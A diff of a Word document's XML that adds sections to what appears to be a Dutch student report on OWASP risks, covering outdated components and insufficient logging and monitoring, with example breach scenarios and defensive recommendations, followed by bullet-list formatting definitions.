+          <w:ilvl w:val="0"/>
+          <w:numId w:val="17"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Controleer op bibliotheken en componenten die niet worden onderhouden of die geen beveiligingspatches voor oudere versies maken. Als patching niet mogelijk is, overweeg dan om een ​​virtuele patch te implementeren om het ontdekte probleem te bewaken, detecteren of beschermen.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="37" w:name="_Toc42011065"/>
+      <w:r>
+        <w:t>Hoe heb ik dit opgelost?</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="37"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
+          <w:color w:val="1F3763" w:themeColor="accent1" w:themeShade="7F"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">In mijn applicatie maak ik gebruik van de nieuwste libraries. Deze libraries moeten wel in de toekomst worden geupdate wanneer hier een kwetsbaarheid voor is gevonden. Tooling zoals github kan hier een makkelijke oplossing voor zijn. Binnen mijn applicatie is dit niet van toepassing omdat het een persoonlijk project is en in de toekomst niet meer zal worden gebruikt. </w:t>
+      </w:r>
+      <w:r>
+        <w:br w:type="page"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="24" w:name="_Toc40955755"/>
-      <w:r>
+      <w:bookmarkStart w:id="38" w:name="_Toc42011066"/>
+      <w:r>
+        <w:lastRenderedPageBreak/>
         <w:t>Insufficient Logging &amp; Monitoring</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="24"/>
+      <w:bookmarkEnd w:id="38"/>
     </w:p>
     <w:p>
       <w:r>
         <w:t>Onvoldoende logging en monitoring, in combinatie met ontbrekende of ineffectieve integratie met incidentrespons, stelt aanvallers in staat systemen verder aan te vallen, doorzettingsvermogen te behouden, naar meer systemen te draaien en gegevens te manipuleren, te extraheren of te vernietigen. De meeste inbreukonderzoeken laten zien dat de tijd om een ​​inbreuk te detecteren meer dan 200 dagen bedraagt, meestal gedetecteerd door externe partijen in plaats van interne processen of monitoring.</w:t>
       </w:r>
-      <w:bookmarkStart w:id="25" w:name="_GoBack"/>
-      <w:bookmarkEnd w:id="25"/>
-    </w:p>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="39" w:name="_Toc42011067"/>
+      <w:r>
+        <w:t>Maar aan welke scenario’s kun je dan denken?</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="39"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="15"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Een open source projectforumsoftware van een klein team werd gehackt met een fout in de software. De aanvallers wisten de interne broncode-opslagplaats met de volgende versie en alle foruminhoud te vernietigen. Hoewel de bron kon worden hersteld, leidde het gebrek aan monitoring, logging of waarschuwing tot een veel ergere inbreuk. Als gevolg van dit probleem is het forumsoftwareproject niet meer actief.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="15"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Een aanvaller gebruikt scans voor gebruikers die een gemeenschappelijk wachtwoord gebruiken. Met dit wachtwoord kunnen ze alle accounts overnemen. Voor alle andere gebruikers laat deze scan slechts één valse login achter. Dit kan na enkele dagen worden herhaald met een ander wachtwoord.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="15"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Een grote Amerikaanse detailhandelaar had naar verluidt een interne sandbox voor malware-analyse die bijlagen analyseerde. De sandbox-software had potentieel ongewenste software gedetecteerd, maar niemand reageerde op deze detectie. De sandbox produceerde al enige tijd waarschuwingen voordat de inbreuk werd ontdekt als gevolg van frauduleuze kaarttransacties door een externe bank.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="40" w:name="_Toc42011068"/>
+      <w:r>
+        <w:t>Hoe kun je deze hacks voorkomen?</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="40"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="16"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Zorg ervoor dat alle inlog-, toegangscontrolefouten en mislukte invoervalidaties aan de server kunnen worden geregistreerd met voldoende gebruikerscontext om verdachte of kwaadaardige accounts te identificeren, en voldoende lang worden bewaard om vertraagde forensische analyse mogelijk te maken.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="16"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Zorg ervoor dat logboeken worden gegenereerd in een indeling die gemakkelijk kan worden gebruikt door oplossingen voor gecentraliseerd logbeheer.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="16"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Zorg ervoor dat transacties met een hoge waarde een controlespoor hebben met integriteitscontroles om manipulatie of verwijdering te voorkomen, zoals alleen databasetabellen toevoegen of iets dergelijks.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="16"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Zorg voor een effectieve monitoring en waarschuwing zodat verdachte activiteiten tijdig worden opgespoord en beantwoord.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="41" w:name="_Toc42011069"/>
+      <w:r>
+        <w:t>Hoe heb ik dit opgelost?</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="41"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Dit is niet voor mij van toepassing. Wel kan ik het toepassen wanneer nodig met een library genaamd </w:t>
+      </w:r>
+      <w:r>
+        <w:t>Log4j2</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> deze libraty logt een class en wanneer er een error of een waning plaatsvind wordt deze opgeslagen. </w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p/>
+    <w:p/>
     <w:sectPr>
       <w:pgSz w:w="11906" w:h="16838"/>
       <w:pgMar w:top="1417" w:right="1417" w:bottom="1417" w:left="1417" w:header="708" w:footer="708" w:gutter="0"/>
@@ -5395,6 +7192,119 @@
     </w:lvl>
   </w:abstractNum>
   <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="02CB64F7"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="5894BE6E"/>
+    <w:lvl w:ilvl="0" w:tplc="04130001">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04130003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="04130005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="04130001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04130003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="04130005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="04130001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04130003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="04130005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="04753DDF"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="28521F4C"/>
@@ -5507,7 +7417,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="12EE6184"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="B42A1FDA"/>
@@ -5620,7 +7530,120 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="1D237E79"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="6BDEC3DC"/>
+    <w:lvl w:ilvl="0" w:tplc="04130001">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04130003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="04130005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="04130001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04130003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="04130005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="04130001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04130003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="04130005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="288248A5"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="9ABCB722"/>
@@ -5733,7 +7756,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="6" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="2F5D2ED3"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="159C4E02"/>
@@ -5846,7 +7869,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="7" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="344576F6"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="2BBC2EA0"/>
@@ -5959,7 +7982,120 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="6" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="8" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="42B67EB2"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="B008A33A"/>
+    <w:lvl w:ilvl="0" w:tplc="04130001">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04130003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="04130005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="04130001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04130003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="04130005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="04130001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04130003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="04130005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="9" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="471713D9"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="44D4EAD4"/>
@@ -6072,7 +8208,120 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="7" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="10" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="589E5FBF"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="3A84281E"/>
+    <w:lvl w:ilvl="0" w:tplc="04130001">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04130003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="04130005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="04130001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04130003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="04130005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="04130001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04130003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="04130005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="11" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="64BA74C7"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="136C99E0"/>
@@ -6185,7 +8434,120 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="8" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="12" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="71A5163A"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="BEC8B316"/>
+    <w:lvl w:ilvl="0" w:tplc="04130001">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04130003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="04130005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="04130001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
